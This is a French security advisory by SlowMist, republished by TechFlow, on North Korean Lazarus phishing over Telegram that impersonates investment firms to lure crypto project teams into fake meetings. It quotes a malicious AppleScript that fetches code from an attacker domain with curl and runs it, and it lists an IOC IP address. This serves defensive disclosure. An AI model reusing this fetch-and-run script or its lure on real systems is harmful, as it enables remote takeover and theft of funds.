
TechFlow : Analyse des attaques ciblées par fraude sur Telegram attribuées aux hackers nord-coréens
TechFlow SélectionTechFlow Sélection

TechFlow : Analyse des attaques ciblées par fraude sur Telegram attribuées aux hackers nord-coréens
Des pirates nord-coréens ont commencé à se faire passer pour des institutions d'investissement réputées afin de tromper les équipes de projets par hameçonnage, avec des conséquences importantes.
Rédaction : 23pds@Équipe de sécurité SlowMist
Contexte
Dès 2022, l'équipe de sécurité SlowMist a découvert via son réseau d'intelligence BTI que le groupe de hackers nord-coréens Lazarus avait lancé une vaste campagne de phishing frauduleux sur Telegram ciblant l'industrie des cryptomonnaies. Récemment, ces hackers se font passer pour des institutions d'investissement renommées afin de tromper les équipes de projets. Étant donné l'ampleur de cette menace, SlowMist publie ici une analyse détaillée.

Tactiques utilisées
1. Choisir une institution d'investissement bien connue comme modèle d'usurpation, puis créer un compte Telegram falsifié :

2. Identifier des projets DeFi populaires comme cibles, et entamer la fraude en prétendant vouloir y investir, à l’aide du compte falsifié :

Les hackers nord-coréens prennent contact avec leurs cibles via messagerie pour établir un lien. Si l’équipe du projet lit le message et manque de vigilance, la scène suivante peut alors se produire :


Une fois la confiance de l’équipe du projet acquise, les hackers proposent un rendez-vous. Deux méthodes d’attaque sont alors employées :
1. Inviter l’équipe du projet à rejoindre une réunion sur un site tel que ***.group-meeting.team, en demandant poliment s’ils ont du temps disponible, tout en fournissant activement un lien malveillant vers la réunion. Après avoir cliqué sur le lien, la victime voit apparaître un message indiquant une restriction géographique. Les hackers profitent alors de la situation pour inciter la victime à télécharger et exécuter un script malveillant censé « modifier la localisation ». Une fois ce script lancé, l’ordinateur de la victime est pris en contrôle par les hackers nord-coréens, entraînant un vol de fonds. Voici le contenu du script malveillant IP_Request.scpt :
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &""\""
run script sc
Explication du code :

2. Utiliser la fonctionnalité « Ajouter un lien personnalisé » du système de réservation de rendez-vous Calendly pour insérer des liens malveillants dans la page d’événement. Comme Calendly s’intègre parfaitement au flux de travail habituel de nombreuses équipes de projets, ces liens ne suscitent guère de méfiance. Il est donc facile pour les victimes de cliquer accidentellement dessus, de télécharger et d’exécuter du code malveillant, permettant ainsi aux hackers nord-coréens d’obtenir des informations ou des privilèges sur le système de la victime.

L’équipe de sécurité SlowMist avait déjà alerté sur cette méthode d’attaque le 30 novembre 2023 :

Indicateurs de compromission (IOC) de base :
IP : 104.168.137.21
Domaines :

Exemples d’attaques malveillantes :


Conclusion
Compte tenu de la persistance de ces escroqueries, il est fortement recommandé aux utilisateurs Web3 de toujours vérifier l’identité des personnes via deux canaux distincts avant d’ajouter un contact, d’activer l’authentification à deux facteurs (2FA) sur Telegram, et de rester constamment vigilant concernant la sécurité des transactions afin d’éviter toute perte financière.
En cas d’exécution involontaire d’un cheval de Troie, transférez immédiatement vos fonds, déconnectez-vous du réseau, lancez une analyse antivirus, et modifiez les mots de passe associés aux comptes présents sur l’ordinateur concerné (y compris ceux enregistrés dans le navigateur).
Bienvenue dans la communauté officielle TechFlow
Groupe Telegram :https://t.me/TechFlowDaily
Compte Twitter officiel :https://x.com/TechFlowPost
Compte Twitter anglais :https://x.com/BlockFlow_News














